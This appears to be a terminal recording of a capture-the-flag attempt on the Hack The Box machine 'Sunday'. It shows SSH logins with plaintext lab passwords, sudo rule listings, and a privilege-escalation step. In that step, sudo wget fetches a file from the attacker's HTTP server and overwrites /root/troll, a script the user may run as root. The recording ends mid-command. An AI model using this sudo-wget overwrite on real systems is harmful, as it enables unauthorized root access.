[53.813905, "o", "H│\u001b[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[1;117H\u001b[1K\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[2;117H\u001b[1K\u001b[94m\r└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[3;117H\u001b[1K\rLast login: Sat Sep  3 16:07:11 2022 from 10.10.14.31\u001b[4;117H\u001b[1K\rOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[5;117H\u001b[1K\r-bash-4.4$ sudo -l\u001b[6;117H\u001b[1K\rUser sammy may run the following commands on sunday:\u001b[7;117H\u001b[1K\r    (ALL) ALL\u001b[8;117H\u001b["]
[53.814358, "o", "1K\r    (root) NOPASSWD: /usr/bin/wget\u001b[9;117H\u001b[1K\r    (root) NOPASSWD: /usr/bin/su\u001b[10;117H\u001b[1K\r-bash-4.4$ \u001b[11;117H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[2B\u001b[1K\u001b[94m\r┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[53;117H\u001b[1K\u001b[94m\r└─\u001b[31m\u001b[1m#\u001b(B\u001b[m nano troll\u001b[54;117H\u001b[1K\u001b[94m\r┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[55;117H\u001b[1K\u001b[94m\r└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[56;117H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[94m\u001b[1;119H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\u001b[2;119H└"]
[53.81453, "o", "─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'sunday' ssh sunny@sunday.htb -p 22022\u001b[K\u001b[3;119HLast login: Sat Sep  3 16:07:20 2022 from 10.10.14.31\u001b[K\u001b[4;119HOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[K\u001b[5;119Hsunny@sunday:~$ sudo -l\u001b[K\u001b[6;119HUser sunny may run the following commands on sunday:\u001b[K\u001b[7;119H    (root) NOPASSWD: /root/troll\u001b[K\u001b[8;119Hsunny@sunday:~$ \u001b[K\u001b[9;119H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[30m\u001b[42m\r\n[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:10 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[8;135H"]
[53.814614, "o", "\u001b[55;117H\u001b[1K\r\u001b[94m└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[8;135H"]
[53.857222, "o", "\u001b[16Dsunny@sunday:~$ \u001b[K"]
[53.857516, "o", "\u001b[10;1H-bash-4.4$ \u001b[106X\u001b[8;135H"]
[55.32461, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H\u001b[39m│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b"]
[55.324673, "o", "[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H"]
[56.324196, "o", "s"]
[56.640811, "o", "\b \b"]
[57.030835, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118"]
[57.031008, "o", "H│\u001b[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[8;135H"]
[57.668985, "o", "s"]
[58.157421, "o", "\b \b"]
[58.821894, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H\u001b[39m│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b"]
[58.821957, "o", "[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H"]
[59.841888, "o", "\u001b[?25l\u001b[1;118H│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b[57;1"]
[59.84198, "o", "18H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[55;5H\u001b[?2004h"]
[59.842515, "o", "\u001b[?25l\u001b[1;118H│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b[57;1"]
[59.842542, "o", "18H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:bash*                                                                                                                                                                                                       \"kali\" 00:10 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[55;5H"]
[60.756629, "o", "s"]
[60.918122, "o", "u"]
[61.333076, "o", "d"]
[61.414967, "o", "o"]
[61.514946, "o", " "]
[61.650053, "o", "-"]
[61.732241, "o", "l"]
[63.304683, "o", "^C\r\n\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m "]
[63.484674, "o", "\u001b[52;100r\u001b[53;117H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[52d\u001b[1K\r\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[1;101r\u001b[53;5H"]
[63.788718, "o", "p"]
[64.026868, "o", "y"]
[64.1797, "o", "t"]
[64.276132, "o", "h"]
[64.319807, "o", "o"]
[64.449019, "o", "n"]
[64.520723, "o", "3"]
[64.63226, "o", " "]
[64.725199, "o", "-"]
[64.835991, "o", "m"]
[64.945104, "o", " "]
[65.166067, "o", "h"]
[65.269158, "o", "t"]
[65.418998, "o", "t"]
[65.484099, "o", "p"]
[65.687961, "o", "."]
[65.777257, "o", "s"]
[65.850461, "o", "e"]
[66.026923, "o", "r"]
[66.196198, "o", "v"]
[66.33815, "o", "r"]
[66.363913, "o", "e"]
[66.534553, "o", " "]
[66.985257, "o", "\b\u001b[91X"]
[67.149552, "o", "\b\u001b[92X"]
[67.290064, "o", "\b\u001b[93X"]
[67.36105, "o", "e"]
[67.413983, "o", "r"]
[67.519614, "o", " "]
[67.618663, "o", "8"]
[67.668831, "o", "0"]
[67.981398, "o", "\r\n\u001b[?2004l"]
[68.050775, "o", "Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\r\n"]
[68.911489, "o", "\u001b[?25l\u001b[1;118H│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b[57;1"]
[68.911526, "o", "18H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:python3*                                                                                                                                                                                                    \"kali\" 00:10 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[55;1H"]
[69.176605, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H\u001b[39m│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b"]
[69.176638, "o", "[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H"]
[69.177577, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H\u001b[39m│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b"]
[69.177622, "o", "[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:10 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H"]
[70.160275, "o", "s"]
[70.292349, "o", "u"]
[70.421848, "o", "d"]
[70.516338, "o", "o"]
[70.639009, "o", " "]
[71.128218, "o", "/"]
[71.385086, "o", "u"]
[71.456077, "o", "s"]
[71.510365, "o", "r"]
[71.655204, "o", "/"]
[71.782569, "o", "b"]
[71.880539, "o", "i"]
[71.948195, "o", "n"]
[72.210816, "o", "/"]
[72.319287, "o", "w"]
[72.461059, "o", "g"]
[72.550934, "o", "e"]
[72.642181, "o", "t"]
[72.844013, "o", " "]
[73.914367, "o", "1"]
[73.960368, "o", "0"]
[74.103652, "o", "."]
[74.25471, "o", "1"]
[74.302969, "o", "0"]
[74.384889, "o", "."]
[74.507718, "o", "0"]
[74.610407, "o", "."]
[75.048851, "o", "\b \b"]
[75.204629, "o", "\b \b"]
[75.332536, "o", "1"]
[75.507059, "o", "4"]
[75.654078, "o", "."]
[75.785394, "o", "3"]
[75.8929, "o", "1"]
[76.469394, "o", "/"]
[77.320273, "o", "t"]
[77.490211, "o", "r"]
[77.557343, "o", "o"]
[77.722374, "o", "l"]
[77.866889, "o", "l"]
[78.021232, "o", " "]
[78.214285, "o", "-"]
[78.442132, "o", "O"]
[78.695012, "o", " "]
[78.961136, "o", "/"]
[79.127074, "o", "r"]
[79.239095, "o", "o"]
[79.388676, "o", "o"]
[79.476887, "o", "t"]
[79.779061, "o", "/"]
[80.020442, "o", "t"]
[80.190282, "o", "r"]
[80.25731, "o", "o"]
[80.435706, "o", "l"]
[80.57301, "o", "l"]
